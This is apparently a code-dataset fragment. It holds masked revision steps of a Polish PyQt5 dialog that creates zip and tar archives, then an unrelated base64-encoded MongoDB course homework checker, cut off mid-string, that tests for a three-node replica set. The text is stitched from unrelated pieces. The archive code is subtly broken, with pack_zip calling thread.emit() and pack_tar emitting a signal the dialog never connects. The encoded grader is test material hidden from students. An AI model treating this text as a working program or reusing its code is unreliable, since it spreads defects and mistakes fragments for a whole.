"<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n\n def __init__(self, model, index, path, parent=None):\n super().__init__(parent)\n self.setWindowTitle('Utworz archiwum')\n self.setWindowModality(QtCore.Qt.WindowModal)\n self.resize(350, 400)\n self.path = path\n self.file_model = model\n self.index = index\n self.create_components()\n self.create_layout()\n self.pack_thread = PackThread()\n self.pack_thread.status_signal.connect(self.ended)\n self.pack_thread.progress_signal.connect(self.progress)\n self.pack_thread.access_signal.connect(self.access)\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n\n def add_catalog(self):\n catalog = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if catalog and not QtCore.QFileInfo(catalog).isSymLink():\n index = self.file_model.index(catalog)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def access(self):\n self.setWindowTitle('Brak dostepu')\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\ndef pack_tar(thread, name, target_path, path_list):\n tar_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with tarfile.open(tar_path, 'w') as tar_file:\n for file_path in path_list:\n if not os.path.isdir(file_path):\n thread.progress_signal.emit(file_path)\n tar_file.add(file_path, arcname=os.path.basename(file_path)\n )\n else:\n catalog_path = os.path.dirname(os.path.abspath(file_path))\n for root_folder, subfolders, files in os.walk(file_path):\n for file in files:\n thread.in_progress_signal.emit(os.path.join(\n root_folder, file))\n tar_file.add(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n catalog_path) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n\n\ndef pack_zip(thread, name, target_path, path_list):\n zip_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with zipfile.ZipFile(zip_path, 'w') as zip_file:\n for path_file in path_list:\n if not os.path.isdir(path_file):\n thread.progress_signal.emit(path_file)\n zip_file.write(path_file, arcname=os.path.basename(\n path_file))\n else:\n path_folder = os.path.dirname(os.path.abspath(path_file))\n for root_folder, subfolders, files in os.walk(path_file):\n for file in files:\n thread.emit(os.path.join(root_folder, file))\n zip_file.write(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n path_folder) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n", "step-4": "__author__ = 'piotrek'\n<mask token>\n\n\nclass CreateArchive(QtWidgets.QDialog):\n\n def __init__(self, model, index, path, parent=None):\n super().__init__(parent)\n self.setWindowTitle('Utworz archiwum')\n self.setWindowModality(QtCore.Qt.WindowModal)\n self.resize(350, 400)\n self.path = path\n self.file_model = model\n self.index = index\n self.create_components()\n self.create_layout()\n self.pack_thread = PackThread()\n self.pack_thread.status_signal.connect(self.ended)\n self.pack_thread.progress_signal.connect(self.progress)\n self.pack_thread.access_signal.connect(self.access)\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp(\n '\\\\w{30}'), self.name_edit))\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding,\n QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.\n set_path)\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog',\n clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=\n self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone',\n clicked=self.file_list.remove_selected)\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n self.progress_lbl = QtWidgets.QLabel()\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.\n pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n v_option_layout.addLayout(h_name_layout)\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n v_option_layout.addLayout(h_path_layout)\n v_option_layout.addWidget(self.file_list)\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n v_option_layout.addLayout(h_remove_layout)\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n self.option_widget.setLayout(option_layout)\n v_main_layout.addWidget(self.option_widget)\n v_main_layout.addWidget(self.progress_bar)\n v_main_layout.addWidget(self.pack_btn)\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.\n archive_type_cb.currentIndex(), QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n path_list = [self.file_model.filePath(index) for index in list_index]\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n self.pack_thread.start()\n\n def add_catalog(self):\n catalog = QtWidgets.QFileDialog.getExistingDirectory(self,\n 'Wybierz katalog', QtCore.QDir.homePath())\n if catalog and not QtCore.QFileInfo(catalog).isSymLink():\n index = self.file_model.index(catalog)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self,\n 'Wybierz plik', QtCore.QDir.homePath())\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.\n name), QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def access(self):\n self.setWindowTitle('Brak dostepu')\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def progress(self, info):\n print('info', info)\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.\n rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.\n currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex()\n )\n\n\ndef pack_tar(thread, name, target_path, path_list):\n tar_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with tarfile.open(tar_path, 'w') as tar_file:\n for file_path in path_list:\n if not os.path.isdir(file_path):\n thread.progress_signal.emit(file_path)\n tar_file.add(file_path, arcname=os.path.basename(file_path)\n )\n else:\n catalog_path = os.path.dirname(os.path.abspath(file_path))\n for root_folder, subfolders, files in os.walk(file_path):\n for file in files:\n thread.in_progress_signal.emit(os.path.join(\n root_folder, file))\n tar_file.add(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n catalog_path) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n\n\ndef pack_zip(thread, name, target_path, path_list):\n zip_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with zipfile.ZipFile(zip_path, 'w') as zip_file:\n for path_file in path_list:\n if not os.path.isdir(path_file):\n thread.progress_signal.emit(path_file)\n zip_file.write(path_file, arcname=os.path.basename(\n path_file))\n else:\n path_folder = os.path.dirname(os.path.abspath(path_file))\n for root_folder, subfolders, files in os.walk(path_file):\n for file in files:\n thread.emit(os.path.join(root_folder, file))\n zip_file.write(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(\n path_folder) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n", "step-5": "__author__ = 'piotrek'\n\nimport os\nimport zipfile\nimport tarfile\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtCore\n\nfrom Widgets.list_view import ListView\nfrom Threads.PackThread import PackThread\n\n\nclass CreateArchive(QtWidgets.QDialog):\n\n def __init__(self, model, index, path, parent=None):\n super().__init__(parent)\n self.setWindowTitle('Utworz archiwum')\n self.setWindowModality(QtCore.Qt.WindowModal)\n self.resize(350, 400)\n\n self.path = path\n self.file_model = model\n self.index = index\n\n self.create_components()\n self.create_layout()\n\n self.pack_thread = PackThread()\n self.pack_thread.status_signal.connect(self.ended)\n self.pack_thread.progress_signal.connect(self.progress)\n self.pack_thread.access_signal.connect(self.access)\n\n def create_item(self, index):\n path = os.path.abspath(self.file_model.filePath(index))\n item = QtGui.QStandardItem(os.path.basename(path))\n item.setIcon(self.file_model.fileIcon(index))\n item.setCheckable(True)\n item.setEditable(False)\n return item\n\n def create_components(self):\n self.option_widget = QtWidgets.QWidget()\n\n self.name_lbl = QtWidgets.QLabel('Nazwa')\n\n self.name_edit = QtWidgets.QLineEdit('untitled')\n self.name_edit.setMaxLength(30)\n self.name_edit.setValidator(QtGui.QRegExpValidator(QtCore.QRegExp('\\w{30}'), self.name_edit))\n\n self.archive_type_cb = QtWidgets.QComboBox()\n self.archive_type_cb.addItem('.zip')\n self.archive_type_cb.addItem('.tar')\n\n self.path_lbl = QtWidgets.QLabel(self.path)\n self.path_lbl.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Preferred)\n self.path_lbl.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.path_lbl.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.set_path_btn = QtWidgets.QPushButton('Sciezka', clicked=self.set_path)\n\n self.file_list = ListView('Pliki do zapakowania')\n self.file_list.add_element(self.index)\n self.file_list.add_to_model(self.create_item(self.index))\n\n self.add_folder_btn = QtWidgets.QPushButton('Dodaj katalog', clicked=self.add_catalog)\n self.add_file_btn = QtWidgets.QPushButton('Dodaj plik', clicked=self.add_file)\n self.remove_selected_btn = QtWidgets.QPushButton('Usun zaznaczone', clicked=self.file_list.remove_selected)\n\n self.progress_bar = QtWidgets.QProgressBar()\n self.progress_bar.setMinimum(0)\n\n self.progress_lbl = QtWidgets.QLabel()\n\n self.pack_btn = QtWidgets.QPushButton('Zapakuj', clicked=self.pack_files)\n\n def set_path(self):\n path = QtWidgets.QFileDialog.getExistingDirectory(self, 'Wybierz katalog', QtCore.QDir.homePath())\n\n if path:\n self.path = path\n self.path_lbl.setText(self.path)\n\n def create_layout(self):\n option_layout = QtWidgets.QGridLayout()\n v_option_layout = QtWidgets.QVBoxLayout()\n\n main_layout = QtWidgets.QGridLayout()\n v_main_layout = QtWidgets.QVBoxLayout()\n\n h_name_layout = QtWidgets.QHBoxLayout()\n h_name_layout.addWidget(self.name_lbl)\n h_name_layout.addWidget(self.name_edit)\n h_name_layout.addWidget(self.archive_type_cb)\n\n v_option_layout.addLayout(h_name_layout)\n\n h_path_layout = QtWidgets.QHBoxLayout()\n h_path_layout.addWidget(self.path_lbl)\n h_path_layout.addWidget(self.set_path_btn)\n\n v_option_layout.addLayout(h_path_layout)\n\n v_option_layout.addWidget(self.file_list)\n\n h_remove_layout = QtWidgets.QHBoxLayout()\n h_remove_layout.addWidget(self.add_folder_btn)\n h_remove_layout.addWidget(self.add_file_btn)\n h_remove_layout.addWidget(self.remove_selected_btn)\n\n v_option_layout.addLayout(h_remove_layout)\n\n option_layout.addLayout(v_option_layout, 0, 0, 1, 1)\n\n self.option_widget.setLayout(option_layout)\n\n v_main_layout.addWidget(self.option_widget)\n\n v_main_layout.addWidget(self.progress_bar)\n\n v_main_layout.addWidget(self.pack_btn)\n\n main_layout.addLayout(v_main_layout, 0, 0, 1, 1)\n\n self.setLayout(main_layout)\n\n def pack_files(self):\n if not self.name_edit.text():\n return\n if not self.file_list.get_quantity():\n return\n self.option_widget.setEnabled(False)\n self.progress_bar.setMaximum(0)\n\n name = self.name_edit.text() + self.archive_type_cb.itemData(self.archive_type_cb.currentIndex(),\n QtCore.Qt.DisplayRole)\n path = self.path_lbl.text()\n list_index = self.file_list.get_index_list()\n\n path_list = [self.file_model.filePath(index) for index in list_index]\n\n if self.archive_type_cb.currentText() == '.zip':\n self.pack_thread.set(pack_zip, name, path, path_list)\n elif self.archive_type_cb.currentText() == '.tar':\n self.pack_thread.set(pack_tar, name, path, path_list)\n\n self.pack_thread.start()\n\n def add_catalog(self):\n catalog = QtWidgets.QFileDialog.getExistingDirectory(self, 'Wybierz katalog', QtCore.QDir.homePath())\n\n if catalog and not QtCore.QFileInfo(catalog).isSymLink():\n index = self.file_model.index(catalog)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def add_file(self):\n file, _filter = QtWidgets.QFileDialog.getOpenFileName(self, 'Wybierz plik', QtCore.QDir.homePath())\n\n if file:\n index = self.file_model.index(file)\n if index not in self.file_list:\n self.file_list.add_element(index)\n self.file_list.add_to_model(self.create_item(index))\n\n def ended(self):\n self.parent().trayIcon.showMessage('Zakonczono',\n 'Zakonczono zapakowywanie pliku {0}'.format(self.pack_thread.name),\n QtWidgets.QSystemTrayIcon.Information, 2000)\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def access(self):\n self.setWindowTitle('Brak dostepu')\n self.pack_btn.setText('Zamknij')\n self.progress_bar.setMaximum(1)\n self.progress_bar.setValue(1)\n self.pack_thread.terminate()\n self.pack_btn.clicked.connect(self.close)\n\n def progress(self, info):\n print('info', info) # remove\n self.setWindowTitle(info)\n\n def closeEvent(self, QCloseEvent):\n if not self.pack_thread.ended:\n QCloseEvent.ignore()\n self.parent().catalog_list.setRootIndex(self.parent().catalog_list.rootIndex())\n self.parent().catalog_list.scrollTo(self.parent().catalog_list.currentIndex())\n self.parent().model_list.refresh(self.parent().catalog_list.rootIndex())\n\n\ndef pack_tar(thread, name, target_path, path_list):\n tar_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with tarfile.open(tar_path, 'w') as tar_file:\n for file_path in path_list:\n if not os.path.isdir(file_path):\n thread.progress_signal.emit(file_path)\n tar_file.add(file_path, arcname=os.path.basename(file_path))\n else:\n catalog_path = os.path.dirname(os.path.abspath(file_path))\n for root_folder, subfolders, files in os.walk(file_path):\n for file in files:\n thread.in_progress_signal.emit(os.path.join(root_folder, file))\n tar_file.add(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(catalog_path) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n\n\ndef pack_zip(thread, name, target_path, path_list):\n zip_path = os.path.join(os.path.abspath(target_path), name)\n try:\n with zipfile.ZipFile(zip_path, 'w') as zip_file:\n for path_file in path_list:\n if not os.path.isdir(path_file):\n thread.progress_signal.emit(path_file)\n zip_file.write(path_file, arcname=os.path.basename(path_file))\n else:\n path_folder = os.path.dirname(os.path.abspath(path_file))\n for root_folder, subfolders, files in os.walk(path_file):\n for file in files:\n thread.emit(os.path.join(root_folder, file))\n zip_file.write(os.path.join(root_folder, file),\n arcname=os.path.join(root_folder[len(path_folder) + 1:], file))\n except IOError:\n thread.access_signal.emit()\n", "step-ids": [ 9, 10, 15, 16, 18 ] }
[ 9, 10, 15, 16, 18 ]
import base64 code=b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBp